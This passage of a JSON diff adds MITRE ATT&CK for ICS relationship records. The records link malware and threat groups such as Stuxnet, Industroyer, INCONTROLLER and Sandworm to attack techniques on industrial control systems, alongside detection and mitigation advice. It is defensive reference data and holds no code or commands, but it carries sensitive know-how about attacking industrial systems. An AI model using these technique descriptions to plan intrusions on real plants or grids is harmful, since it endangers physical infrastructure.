Pwn2Own hacking contest Retrieved. 2020/09/25 ", + "url": "https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--94c903f4-a6c1-40c4-9e9b-0896a5d43b7e", + "created": "2022-09-27T15:48:55.986Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T15:48:55.986Z", + "description": "Monitor device alarms that indicate controller task parameters have changed, although not all devices produce such alarms.\n \n[Program Download](https://attack.mitre.org/techniques/T0843) may be used to enable this technique. Monitor for program downloads which may be noticeable via operational alarms. Asset management systems should be consulted to understand expected program versions.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b3862aa6-7bd0-46a4-83b6-bb687bb7caa6", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Chris Bing May 2018", + "description": "Chris Bing 2018, May 24 Trisis masterminds have expanded operations to target U.S. industrial firms Retrieved. 2020/01/03 ", + "url": "https://www.cyberscoop.com/xenotime-ics-cyber-attacks-trisis-dragos/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:07:07.445Z", + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) utilizes watering hole websites to target industrial employees. (Citation: Chris Bing May 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a47cd7b9-2b73-480c-a8ab-2dfa908e02ea", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ESET Research Whitepapers September 2018", + "description": "ESET Research Whitepapers 2018, September LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group Retrieved. 2020/09/25 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf" + }, + { + "source_name": "Intel", + "description": "Intel ESET Research Whitepapers 2018, September LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group Retrieved. 2020/09/25 Intel Hardware-based Security Technologies for Intelligent Retail Devices Retrieved. 2020/09/25 ", + "url": "https://www.intel.com/content/dam/www/public/us/en/documents/white-papers/security-technologies-4th-gen-core-retail-paper.pdf" + }, + { + "source_name": "N/A", + "description": "N/A Trusted Platform Module (TPM) Summary Retrieved. 2020/09/25 ", + "url": "https://www.trustedcomputinggroup.org/wp-content/uploads/Trusted-Platform-Module-Summary_04292008.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:20:11.016Z", + "description": "Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. Use Trusted Platform Module technology. (Citation: N/A) Move system's root of trust to hardware to prevent tampering with the SPI flash memory. (Citation: ESET Research Whitepapers September 2018) Technologies such as Intel Boot Guard can assist with this. (Citation: Intel)\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ac1d6e1-b07f-476a-9732-84984ebc2405", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8a06c15b-b7e5-4374-9265-8d9020e126cd", + "created": "2021-10-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-19T17:31:56.055Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) infects DLL's associated with the WinCC Simatic manager which are responsible for opening project files. If a user opens an uninfected project file using a compromised manager, the file will be infected with Stuxnet code. If an infected project is opened with the Simatic manager, the modified data file will trigger a search for the `xyz.dll` file. If the `xyz.dll` file is not found in any of the specified locations, the malicious DLL will be loaded and executed by the manager. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c664bb6c-59f0-4b31-bbb4-ef66fca933d4", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:45:39.703Z", + "description": "Monitor for newly executed processes that depend on user interaction, especially for applications that can embed programmatic capabilities (e.g., Microsoft Office products with scripts, installers, zip files). This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--dfe43fa1-ffc2-4c6c-a91d-f2ca55f21ccb", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:23:18.048Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) copies itself into Step 7 projects in such a way that it automatically executes when the Step 7 project is loaded. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fc4803cb-d6bf-4674-bf40-d4b0997824ba", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Eduard Kovacs May 2018", + "description": "Eduard Kovacs 2018, May 10 'Allanite' Group Targets ICS Networks at Electric Utilities in US, UK Retrieved. 2020/01/03 ", + "url": "https://www.securityweek.com/allanite-group-targets-ics-networks-electric-utilities-us-uk" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:40:42.440Z", + "description": "[ALLANITE](https://attack.mitre.org/groups/G1000) leverages watering hole attacks to gain access into electric utilities. (Citation: Eduard Kovacs May 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--190242d7-73fc-4738-af68-20162f7a5aae", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ad77a940-150c-4d73-bf5a-1df2d9436f9c", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:36:33.957Z", + "description": "Monitor network traffic for anomalies associated with known AiTM behavior. For Collection activity where transmitted data is not manipulated, anomalies may be present in network management protocols (e.g., ARP, DHCP).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b2d4989c-e2d1-40c4-b1d8-07834a71f26f", + "created": "2021-04-11T14:06:54.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T20:08:31.892Z", + "description": "In the Ukraine 2015 Incident, [Sandworm Team](https://attack.mitre.org/groups/G0034) developed and used malicious firmware to render communication devices inoperable. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--51eca7b9-6330-48a8-badd-65ed3e9d3639", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.072Z", + "relationship_type": "mitigates", + "description": "Restrict unauthorized devices from accessing serial comm ports.\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--6157408d-1eb3-4445-8d8a-14619458954f", + "created": "2022-09-27T15:26:40.297Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T15:26:40.297Z", + "description": "Monitor for network traffic originating from unknown/unexpected hardware devices. Local network traffic metadata (such as source MAC addressing) may be helpful in identifying transient assets.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9902691c-aaf2-48a1-b1ca-cd6f652ae1c6", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:53:25.280Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) is able to block serial COM channels temporarily causing a denial of control. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--11ab5b1a-b7b3-43bb-bc19-d65bf4ed89f3", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T17:07:03.003Z", + "description": "Program uploads may be observable in ICS management protocols or file transfer protocols. Note when protocol functions related to program uploads occur. In cases where the ICS protocols is not well understood, one option is to examine network traffic for the program files themselves using signature-based tools.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--71c9db9c-6f0c-4e33-a20a-dcd5b791a49a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.228Z", + "relationship_type": "mitigates", + "description": "Use user training as a way to bring awareness to common phishing and spearphishing techniques and how to raise suspicion for potentially malicious events.\n", + "source_ref": "course-of-action--dc61c280-c29d-44e5-a960-c0dd1623d2ba", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--7912946d-1605-465a-a55c-36bb104235ab", + "created": "2022-09-27T16:08:53.157Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T16:08:53.157Z", + "description": "Monitor device alarms that indicate the program has changed, although not all devices produce such alarms.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a78e727c-8e42-448c-beb4-463804e18be0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.123Z", + "relationship_type": "mitigates", + "description": "Minimize permissions and access for service accounts to limit impact of exploitation. (Citation: Keith Stouffer May 2015)\n", + "source_ref": "course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--880161a4-d6c9-4e5b-a78d-39319cfa43ab", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:10:18.233Z", + "description": "Some asset application logs may provide information on I/O points related to write commands. Monitor for write commands for an excessive number of I/O points or manipulating a single value an excessive number of times.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--433539bf-cb17-4de1-9c0f-e579b041514f", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos Inc. June 2017", + "description": "Dragos Inc. 2017, June 13 Industroyer - Dragos - 201706: Analysis of the Threat to Electic Grid Operations Retrieved. 2017/09/18 ", + "url": "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:16:26.262Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) attempts to connect with a hardcoded internal proxy on TCP 3128 [default Squid proxy]. If established, the backdoor attempts to reach an external C2 server via the internal proxy. (Citation: Dragos Inc. June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--54a977df-ca85-43b2-b2bc-96fdcd23aa9b", + "created": "2023-03-30T19:24:38.022Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Industroyer2 Mandiant April 2022", + "description": "Daniel Kapellmann Zafra, Raymond Leong, Chris Sistrunk, Ken Proska, Corey Hildebrandt, Keith Lunden, Nathan Brubaker. (2022, April 25). INDUSTROYER.V2: Old Malware Learns New Tricks. Retrieved March 30, 2023.", + "url": "https://www.mandiant.com/resources/blog/industroyer-v2-old-malware-new-tricks" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T16:17:58.795Z", + "description": "[Industroyer2](https://attack.mitre.org/software/S1072) has the capability to terminate specified processes (i.e., PServiceControl.exe and PService_PDD.exe) and rename each process to prevent restart. These are defined through a hardcoded configuration.(Citation: Industroyer2 Mandiant April 2022)", + "relationship_type": "uses", + "source_ref": "malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--41adaf0b-b7ae-4bdb-9a5b-567fd0911d7a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.145Z", + "relationship_type": "mitigates", + "description": "Protocols used for control functions should provide authenticity through MAC functions or digital signatures. If not, utilize bump-in-the-wire devices or VPNs to enforce communication authenticity between devices that are not capable of supporting this (e.g., legacy controllers, RTUs).\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--8da928a0-1c87-471f-aad7-5a1fdd438357", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:44:43.674Z", + "description": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash, which may be recorded in the application log.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9e0810a5-ad02-487f-b0a8-bf07decca493", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:07:52.455Z", + "description": "Monitor for a loss of network communications, which may indicate this technique is being used.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a847aa03-ea56-47d1-8f4e-f9e0dd9707a0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.125Z", + "relationship_type": "mitigates", + "description": "Consider removal of remote services which are not regularly in use, or only enabling them when required (e.g., vendor remote access). Ensure all external remote access point (e.g., jump boxes, VPN concentrator) are configured with least functionality, especially the removal of unnecessary services. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--d0909119-2f71-4923-87db-b649881672d7", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--19c0d2bc-8de9-47c3-a1ee-63abc07c4348", + "created": "2022-09-28T21:18:55.279Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:17:21.181Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can send custom Modbus commands to write register values on Schneider PLCs.(Citation: CISA-AA22-103A) \n\n[INCONTROLLER](https://attack.mitre.org/software/S1045) can send write tag values on OPC UA servers.(Citation: CISA-AA22-103A) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--80a69b56-337d-446a-8167-8b9f63083c4f", + "created": "2022-09-28T21:24:21.810Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + }, + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.442Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) includes a library that creates Modbus connections with a device to request its device ID.(Citation: CISA-AA22-103A)(Citation: Wylie-22) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a7caa7f2-cfb9-4fc9-ae8d-49349b6c260f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": 